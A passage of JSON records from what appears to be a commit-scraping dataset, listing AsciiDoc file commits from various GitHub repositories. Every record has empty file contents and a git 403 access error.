403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62d9062952f5724153e3e1a5ba9616e28d062c0a","subject":"Update 2019-01-13-.adoc","message":"Update 2019-01-13-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-.adoc","new_file":"_posts\/2019-01-13-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0310616c736b4e96136e1141d47d7257385e73dc","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38aa2bd653e07b3b900e7edd2368792e029990dd","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/fighting_my_prejudices.adoc","new_file":"content\/writings\/fighting_my_prejudices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9058fc18bab948df850e8ff6790e677a3772ae61","subject":"Small fixes","message":"Small fixes\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch09-cicd.adoc","new_file":"developer-tools\/java\/chapters\/ch09-cicd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0832d2dcbf2e8453a7d86623c7b0450c8359b5d1","subject":"Update 2015-10-01-Daisies-arent-roses.adoc","message":"Update 2015-10-01-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-01-Daisies-arent-roses.adoc","new_file":"_posts\/2015-10-01-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c972fa964eccfbf342e56f83e54f323a85431cb","subject":"Publish 2016-01-012-HubPress-CNAME-and-A-Records.adoc","message":"Publish 2016-01-012-HubPress-CNAME-and-A-Records.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"2016-01-012-HubPress-CNAME-and-A-Records.adoc","new_file":"2016-01-012-HubPress-CNAME-and-A-Records.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0131c46c0d08c3784c4b37cc92cbd61da8f85b","subject":"y2b create post iPhone Signal Booster - Does It Suck?","message":"y2b create post iPhone Signal Booster - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-27-iPhone-Signal-Booster--Does-It-Suck.adoc","new_file":"_posts\/2016-11-27-iPhone-Signal-Booster--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b869562a8c3d52053a5ddb926ad74893c48079f2","subject":"Added InOnly EIP docs","message":"Added InOnly EIP docs\n","repos":"tdiesler\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,dmvolod\/camel,punkhorn\/camel-upstream,tdiesler\/camel,pmoerenhout\/camel,tdiesler\/camel,tadayosi\/camel,sverkera\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,snurmine\/camel,pax95\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,sverkera\/camel,objectiser\/camel,jonmcewen\/camel,adessaigne\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,dmvolod\/camel,apache\/camel,akhettar\/camel,zregvart\/camel,pax95\/camel,cunningt\/camel,kevinearls\/camel,jamesnetherton\/camel,pax95\/camel,ullgren\/camel,gautric\/camel,onders86\/camel,kevinearls\/camel,gautric\/camel,mcollovati\/camel,tadayosi\/camel,jonmcewen\/camel,sverkera\/camel,kevinearls\/camel,akhettar\/camel,Fabryprog\/camel,anoordover\/camel,akhettar\/camel,anoordover\/camel,christophd\/camel,Fabryprog\/camel,dmvolod\/camel,punkhorn\/camel-upstream,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,gautric\/camel,curso007\/camel,DariusX\/camel,pax95\/camel,sverkera\/camel,cunningt\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,onders86\/camel,christophd\/camel,Fabryprog\/camel,ullgren\/camel,cunningt\/camel,kevinearls\/camel,adessaigne\/camel,zregvart\/camel,pmoerenhout\/camel,jamesnetherton\/camel,objectiser\/camel,apache\/camel,snurmine\/camel,jonmcewen\/camel,gautric\/camel,gnodet\/camel,alvinkwekel\/camel,gautric\/camel,cunningt\/camel,zregvart\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,anoordover\/camel,dmvolod\/camel,objectiser\/camel,snurmine\/camel,DariusX\/camel,dmvolod\/camel,nicolaferraro\/camel,DariusX\/camel,jamesnetherton\/camel,sverkera\/camel,akhettar\/camel,anoordover\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,pmoerenhout\/camel,snurmine\/camel,gnodet\/camel,ullgren\/camel,Fabryprog\/camel,jonmcewen\/camel,onders86\/camel,kevinearls\/camel,mcollovati\/camel,mcollovati\/camel,snurmine\/camel,christophd\/camel,jonmcewen\/camel,anoordover\/camel,kevinearls\/camel,nikhilvibhav\/camel,cunningt\/camel,zregvart\/camel,nicolaferraro\/camel,CodeSmell\/camel,apache\/camel,alvinkwekel\/camel,sverkera\/camel,CodeSmell\/camel,christophd\/camel,jamesnetherton\/camel,dmvolod\/camel,mcollovati\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,gnodet\/camel,objectiser\/camel,jamesnetherton\/camel,curso007\/camel,pax95\/camel,onders86\/camel,curso007\/camel,davidkarlsen\/camel,onders86\/camel,gnodet\/camel,ullgren\/camel,gautric\/camel,nicolaferraro\/camel,davidkarlsen\/camel,onders86\/camel,akhettar\/camel,CodeSmell\/camel,curso007\/camel,christophd\/camel,DariusX\/camel,akhettar\/camel,curso007\/camel,tadayosi\/camel,tdiesler\/camel,jonmcewen\/camel,pmoerenhout\/camel,alvinkwekel\/camel,curso007\/camel,snurmine\/camel,alvinkwekel\/camel,anoordover\/camel,pmoerenhout\/camel,tadayosi\/camel,apache\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/inOnly-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/inOnly-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e73843cbf43b3bb717c60829675b36385bce377","subject":"Started documenting paredit features","message":"Started documenting paredit features\n","repos":"rundis\/clj-light-refactor","old_file":"PAREDIT.adoc","new_file":"PAREDIT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rundis\/clj-light-refactor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b98c3ef2dd475c6e03395a92e85e23e96009126","subject":"create post DON'T Buy The Batband, Unless...","message":"create post DON'T Buy The Batband, Unless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-DONT-Buy-The-Batband,-Unless....adoc","new_file":"_posts\/2018-02-26-DONT-Buy-The-Batband,-Unless....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4300a9b9c362d3301c374d3b317829a9a8f4e42","subject":"Update 2017-04-27-Week-5-Lets-play-guitar.adoc","message":"Update 2017-04-27-Week-5-Lets-play-guitar.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-04-27-Week-5-Lets-play-guitar.adoc","new_file":"_posts\/2017-04-27-Week-5-Lets-play-guitar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1e86771a6b4bcddc539766ef969c0682181baf6","subject":"Update 2013-03-23-Wicket-and-JQPlot.adoc","message":"Update 2013-03-23-Wicket-and-JQPlot.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2013-03-23-Wicket-and-JQPlot.adoc","new_file":"_posts\/2013-03-23-Wicket-and-JQPlot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ad4d310509d1d8b4c252f16fa623459d4dc3bc7","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9d8e78485c6247d399437fe0b0b6ec97a848dfe","subject":"Delete the file at '_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc'","message":"Delete the file at '_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4077705d59b67c81cb8fc16194d177732db0c23d","subject":"Renamed '_posts\/2017-05-31-TWCTF-2017.adoc' to '_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","message":"Renamed '_posts\/2017-05-31-TWCTF-2017.adoc' to '_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"688653f735cf68bb73ac2a171f0b3ae0a93187b3","subject":"y2b create post HKS Racing Controller (PS3) Unboxing \\u0026 Overview","message":"y2b create post HKS Racing Controller (PS3) Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-15-HKS-Racing-Controller-PS3-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-09-15-HKS-Racing-Controller-PS3-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68bb20c4548fdd38272fee30d93304c3a6526ed1","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d363acc602718c085b5b3729526502335fb005f6","subject":"Add release process documentation","message":"Add release process documentation","repos":"OmniLayer\/OmniJ,OmniLayer\/OmniJ,OmniLayer\/OmniJ","old_file":"adoc\/release-process.adoc","new_file":"adoc\/release-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b14664a8c834b2a812884087b18ab21e6aabd96","subject":"Fix typos in reference (#3979)","message":"Fix typos in reference (#3979)\n\n","repos":"fhanik\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,mdeinum\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,ollie314\/spring-security,wkorando\/spring-security,rwinch\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,pwheel\/spring-security,fhanik\/spring-security,ollie314\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,pwheel\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,kazuki43zoo\/spring-security,kazuki43zoo\/spring-security,eddumelendez\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,thomasdarimont\/spring-security,SanjayUser\/SpringSecurityPro,wkorando\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,djechelon\/spring-security,ollie314\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,pwheel\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59a2cbbcf1ab4ba2e0226e310d3cbcc8212285f9","subject":"added asciidoc mark up for lists to improve readability","message":"added asciidoc mark up for lists to improve readability","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/dev_env.adoc","new_file":"docs\/dev_env.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b49165cc4a9d067b8a50e92ffc84033cf9c96b15","subject":"Create common-installGrails5.adoc","message":"Create common-installGrails5.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-installGrails5.adoc","new_file":"src\/main\/docs\/common-installGrails5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b09398cb2afbe79b55de45a8010bcda7dacd65e3","subject":"Adding a Gradle Plugin common snippet","message":"Adding a Gradle Plugin common snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/commmon-addingAGradlePlugin.adoc","new_file":"src\/main\/docs\/commmon-addingAGradlePlugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3302f1c77b54cf2b26ccae56ba7771b64eba4b8","subject":"\u4f5c\u696d\u306e\u9032\u3081\u65b9\u306bgit\u30b3\u30de\u30f3\u30c9\u8ffd\u8a18","message":"\u4f5c\u696d\u306e\u9032\u3081\u65b9\u306bgit\u30b3\u30de\u30f3\u30c9\u8ffd\u8a18\n","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d3b614abd7d2e036d5c7270e5f65cc2b8ae70d3","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04f9734fdd5a31630ed7b1f0948dae46905a8344","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ad6b469bd9765834699b9429521662ea99585db","subject":"Update 2015-02-20-Django-MongoDB-Engine.adoc","message":"Update 2015-02-20-Django-MongoDB-Engine.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-20-Django-MongoDB-Engine.adoc","new_file":"_posts\/2015-02-20-Django-MongoDB-Engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58f2a58bc40772a83214fbffbc16f6a5b6bc99b0","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"411a2d07abd41ad27ce640270c635b7ec37277e1","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47084b5ef0d42760b613548347721d4a4bd56714","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"542c20266331adc32f1632031da6e185d6fa6009","subject":"added git revert doc","message":"added git revert doc\n","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e8a78df555b259fd73f216540994d87ff8d71138","subject":"Fix markdown formatting (#28392)","message":"Fix markdown formatting (#28392)\n\n","repos":"s1monw\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"136b72bf8725b1ee4b005b14b03b0c15b80be8f1","subject":"Added README in asciidoc format.","message":"Added README in asciidoc format.\n","repos":"blajzer\/syrup,blajzer\/syrup","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blajzer\/syrup.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac043f57ac4a1da4b897b5b109562b57515c08f4","subject":"Update 2014-07-15-Episode-9-Ambiance.adoc","message":"Update 2014-07-15-Episode-9-Ambiance.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-07-15-Episode-9-Ambiance.adoc","new_file":"_posts\/2014-07-15-Episode-9-Ambiance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"878165fda44364883e840b0373ea36a7c048bf24","subject":"Update 2016-04-06-Rompiendo-sistemas.adoc","message":"Update 2016-04-06-Rompiendo-sistemas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Rompiendo-sistemas.adoc","new_file":"_posts\/2016-04-06-Rompiendo-sistemas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9517c8ce7826b623e94409bb8f58bd73437dabf","subject":"Update 2016-06-23-Json-web-Token-JWT.adoc","message":"Update 2016-06-23-Json-web-Token-JWT.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2016-06-23-Json-web-Token-JWT.adoc","new_file":"_posts\/2016-06-23-Json-web-Token-JWT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95835a8f0ec04dd89cec1ed3bbae6f994ce639e7","subject":"Added xmlRpc dataformat docs to Gitbook","message":"Added xmlRpc dataformat docs to 